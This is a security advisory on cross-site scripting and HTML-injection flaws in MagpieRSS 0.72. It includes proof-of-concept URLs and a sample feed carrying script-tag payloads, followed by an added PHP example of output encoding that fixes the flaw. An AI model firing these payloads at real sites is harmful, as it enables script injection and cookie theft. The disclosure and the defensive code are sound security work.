source: https://www.securityfocus.com/bid/34891/info

MagpieRSS is prone to multiple cross-site scripting issues and an HTML-injection issue because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

MagpieRSS 0.72 is vulnerable; other versions may also be affected.

http://www.example.com/magpierss-0.72/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script
http://www.example.com/magpierss-0.72/scripts/magpie_simple.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script

Justin.MadIrish.net <script>alert('xss title');</script>- Justin's Personal Homepage
http://www.example.com
Close personal friends with Evil Eve.
en
Disturbing<script>alert('xss title');</script> XSS<script>alert('xss title');</script>
http://www.example.com/node/343
foobar
Wed, 04 Mar 2009 13:42:09 +0000
justin
343 at http://www.example.com
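
The output encoding the advisory says is missing, shown as an added example that is not MagpieRSS code and not part of the original advisory. The function names h, safe_http_url and render_feed_page are hypothetical, and the inputs are constructed from the values shown above; both the url parameter and the feed fields are treated as untrusted.

```php
<?php
// Added example: not MagpieRSS code. All function names are hypothetical.

// Encode a value for HTML text and quoted-attribute contexts.
function h(?string $s): string {
    return htmlspecialchars($s ?? '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Accept only absolute http(s) URLs; anything else becomes an empty string.
function safe_http_url(?string $u): string {
    $u = trim($u ?? '');
    $parts = parse_url($u);
    if ($parts === false || empty($parts['host'])) {
        return '';
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    return in_array($scheme, ['http', 'https'], true) ? $u : '';
}

// Render the form and the feed with every untrusted value encoded.
function render_feed_page(?string $urlParam, array $channel, array $items): string {
    $out  = '<form><input type="text" name="url" value="' . h($urlParam) . '"></form>' . "\n";
    $out .= '<h1>' . h($channel['title'] ?? '') . "</h1>\n<ul>\n";
    foreach ($items as $item) {
        $title = h($item['title'] ?? '');
        $href  = safe_http_url($item['link'] ?? null);
        $out  .= $href !== ''
            ? '<li><a href="' . h($href) . '">' . $title . "</a></li>\n"
            : '<li>' . $title . "</li>\n"; // rejected link: title only
    }
    return $out . "</ul>\n";
}

// Constructed inputs mirroring the values shown in the advisory.
$urlParam = "\"><script>alert('xss');</script";
$channel  = ['title' => "Justin.MadIrish.net <script>alert('xss title');</script>"];
$items    = [
    ['title' => "Disturbing<script>alert('xss title');</script>",
     'link'  => 'http://www.example.com/node/343'],
    ['title' => 'constructed item, non-http link', 'link' => 'mailto:constructed@example.com'],
];

$html = render_feed_page($urlParam, $channel, $items);
if (stripos($html, '<script') !== false) { // encoding must leave no raw tag
    throw new RuntimeException('unencoded markup reached the output');
}
echo $html;
```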